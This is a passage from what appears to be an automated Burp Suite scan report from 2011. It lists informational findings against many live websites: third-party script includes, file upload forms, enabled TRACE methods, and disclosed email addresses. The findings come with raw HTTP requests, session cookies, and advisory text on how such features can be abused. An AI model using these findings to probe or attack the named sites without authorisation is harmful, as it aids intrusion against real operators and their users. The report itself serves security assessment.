Path:	/stormforce/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /stormforce/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:56 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=436
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:04:23 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14316
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Stormforce - Snow Day Alerts</title>
<meta name="publisher" content="New England New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1587. http://www1.whdh.com/termsofuse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/termsofuse

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /termsofuse HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: termsofuse.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=172800
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Wed, 26 Jan 2011 21:56:19 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close
Content-Length: 23953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Terms of Use, Site Disclaimer</title>
<meta name="publisher" con
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1588. http://www1.whdh.com/traffic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/traffic/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.sigalert.com/Data/RenderPortal.js

Request

GET /traffic/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:12 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1750
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:25:33 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close
Content-Length: 8278

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS - Fast Track Traffic</title>
<meta name="publisher" content="New Engla
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</noscript>
<script src="http://www.sigalert.com/Data/RenderPortal.js"></script>
...[SNIP]...

21.1589. http://www1.whdh.com/video/7newslive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/video/7newslive

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /video/7newslive HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:20 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: 7newslive.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:09 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close
Content-Length: 8674

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>7News Live Streaming Video</title>
<meta name="publisher" content="New England News
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1590. http://www1.whdh.com/video/player previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/video/player

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /video/player HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:23 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: player.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=900
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:24:29 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 mdw107103 (MII-APC/1.6)
Connection: close
Content-Length: 21966

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS - Top Video Video</title>
<meta name="publisher" content="New England
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1591. http://www1.whdh.com/video/player/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/video/player/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /video/player/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:07 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 3
Cache-Control: max-age=425
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:03:22 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Content-Length: 21966
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS - Top Video Video</title>
<meta name="publisher" content="New England
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1592. http://www1.whdh.com/weather/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/weather/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wn.wsvn.com/global/video/flash/WNVideo.asp?1
http://www.google.com/jsapi

Request

GET /weather/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:45:24 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 696
Cache-Control: max-age=723
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 21:56:37 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107003 (MII-APC/1.6)
Content-Length: 54167
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH 7NEWS NBC Boston Weather Complete Local Weather Coverage</title>
<meta name="pu
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://wn.wsvn.com/global/video/flash/WNVideo.asp?1"></script>
...[SNIP]...

21.1593. http://www1.whdh.com/weather/radar/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/weather/radar/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /weather/radar/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:03 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=773
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:09:06 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10391
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Interactive Radar</title>
<meta name="publisher" content="New England News Station B
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1594. http://www25.big.jp/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www25.big.jp
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /favicon.ico HTTP/1.1
Host: www25.big.jp
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:03:07 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2574
Content-Type: text/html; charset=UTF-8

<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/favicon.ico</Title>
<Meta Http-equiv="content-type" Content="text/html; charset=utf-8"
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1595. http://www25.big.jp/~jam/leafnode+/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www25.big.jp
Path:	/~jam/leafnode+/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /~jam/leafnode+/ HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:02 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2582
Connection: close
Content-Type: text/html; charset=UTF-8

<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/~jam/leafnode+/</Title>
<Meta Http-equiv="content-type" Content="text/html; charset=ut
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1596. http://www3.whdh.com/mobile/phoneforecast/settings.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www3.whdh.com
Path:	/mobile/phoneforecast/settings.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /mobile/phoneforecast/settings.php HTTP/1.1
Host: www3.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1597. http://xfactor.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xfactor.tweetmeme.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: xfactor.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1598. http://yoga.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://yoga.tweetmeme.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: yoga.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1599. http://youtube.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://youtube.tweetmeme.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: youtube.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22. File upload functionality previous next
There are 6 instances of this issue:

http://translate.google.com/
http://translate.google.com/translate_t
http://www.freebsd.org/send-pr.html
http://www.netlingo.com/add.php
http://www.sailinganarchy.com/article_submission.php
http://www.thisnext.com/pick/new/submit/sociable/

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defense-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

22.1. http://translate.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://translate.google.com/

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.2. http://translate.google.com/translate_t previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/translate_t

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://translate.google.com/

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

22.3. http://www.freebsd.org/send-pr.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/send-pr.html

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://www.freebsd.org/cgi/dosendpr.cgi

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /send-pr.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2587588304"
Last-Modified: Tue, 04 Jan 2011 20:39:09 GMT
Content-Length: 12238
Connection: close
Date: Mon, 24 Jan 2011 16:39:38 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator"
...[SNIP]...
</label>: <input id="PATCH" type="FILE" name="patch" maxlength="102400"
accept="text/*" /><br />
...[SNIP]...

22.4. http://www.netlingo.com/add.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/add.php

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://www.netlingo.com/ajaxforms/word-action.php

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /add.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 46110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</span>
<input id="fileToUpload" type="file" size="40" name="fileToUpload" class="inputAreaa" onClick="setFlag();" />
<input name="imageid" id="imageid" type="hidden" value="1" />
...[SNIP]...

22.5. http://www.sailinganarchy.com/article_submission.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/article_submission.php

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://www.sailinganarchy.com/article_submission.php

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /article_submission.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:41 GMT
Server: Apache
Vary: User-Agent
Content-Length: 3970
Connection: close
Content-Type: text/html

<html>
<head>
<title>Article Submission</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/SA_CSS.css" rel="stylesheet" type="text/css">
<link href="/css
...[SNIP]...
<p>
<input name="attachment1" type="file" id="attachment1" size="75" maxlength="255" />
 </p>
...[SNIP]...

22.6. http://www.thisnext.com/pick/new/submit/sociable/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thisnext.com
Path:	/pick/new/submit/sociable/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

https://www.thisnext.com/signup2/

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /pick/new/submit/sociable/?url={u}&name={t} HTTP/1.1
Host: www.thisnext.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23. TRACE method is enabled previous next
There are 6 instances of this issue:

https://billing.cloudaccess.net/
http://cloudaccess.net/
http://demo.joomla.org/
http://www.cloudaccess.net/
https://www.cloudaccess.net/
http://www.x64bitdownload.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

23.1. https://billing.cloudaccess.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/

Request

TRACE / HTTP/1.0
Host: billing.cloudaccess.net
Cookie: 35afbb40cb16d135

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:23 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: billing.cloudaccess.net
Cookie: 35afbb40cb16d135

23.2. http://cloudaccess.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cloudaccess.net
Path:	/

Request

TRACE / HTTP/1.0
Host: cloudaccess.net
Cookie: d1dc3f996f59356

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:58:40 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: cloudaccess.net
Cookie: d1dc3f996f59356

23.3. http://demo.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://demo.joomla.org
Path:	/

Request

TRACE / HTTP/1.0
Host: demo.joomla.org
Cookie: bbfaaca11f3430e1

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:51 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: demo.joomla.org
Cookie: bbfaaca11f3430e1

23.4. http://www.cloudaccess.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/

Request

TRACE / HTTP/1.0
Host: www.cloudaccess.net
Cookie: 9ea38f6789e13d8a

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:37 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cloudaccess.net
Cookie: 9ea38f6789e13d8a

23.5. https://www.cloudaccess.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cloudaccess.net
Path:	/

Request

TRACE / HTTP/1.0
Host: www.cloudaccess.net
Cookie: 3d69c231cf8902c9

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:54:52 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cloudaccess.net
Cookie: 3d69c231cf8902c9

23.6. http://www.x64bitdownload.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.x64bitdownload.com
Cookie: be57fe7a3b8d4ea7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:58:55 GMT
Server: Apache/2.2.9 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.x64bitdownload.com
Cookie: be57fe7a3b8d4ea7

24. Email addresses disclosed previous next
There are 489 instances of this issue:

https://acc.newsguy.com/user/-/accnt_contact
http://ads.adbrite.com/adserver/behavioral-data/8201
http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://aws.amazon.com/ec2/x22
http://aws.amazon.com/x22
http://backend.parenthood.com/s_code.js
http://blog.tweetmeme.com/
http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html
http://cdn.statics.live.spongecell.com/ups/v3m/lib/en/resources.xml
http://code.google.com/p/swfobject/
http://community.joomla.org/
http://community.joomla.org/index.php
http://community.parenthood.com/feed/get/type/rss/source/domain/id/40337
http://community.parenthood.com/service/searchEverythingAsRss.kickAction
http://demo.joomla.org/
http://demo.joomla.org/index.php
http://developer.joomla.org/media/system/js/mootools-more.js
http://dir.filewatcher.com/d/FreeBSD/6-stable/amd64.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/6-stable/amd64/aub-2.2.tbz.41898.html
http://dir.filewatcher.com/d/FreeBSD/6-stable/ia64.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/6-stable/ia64/aub-2.2.tbz.41897.html
http://dir.filewatcher.com/d/FreeBSD/6-stable/sparc64.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/6-stable/sparc64/aub-2.2.tbz.41911.html
http://dir.filewatcher.com/d/FreeBSD/6.2-release/sparc64.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/6.2-release/sparc64/aub-2.2.tbz.41730.html
http://dir.filewatcher.com/d/FreeBSD/6.3-release/amd64.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/6.3-release/amd64/aub-2.2.tbz.41893.html
http://dir.filewatcher.com/d/FreeBSD/6.3-release/i386.0.0.htm
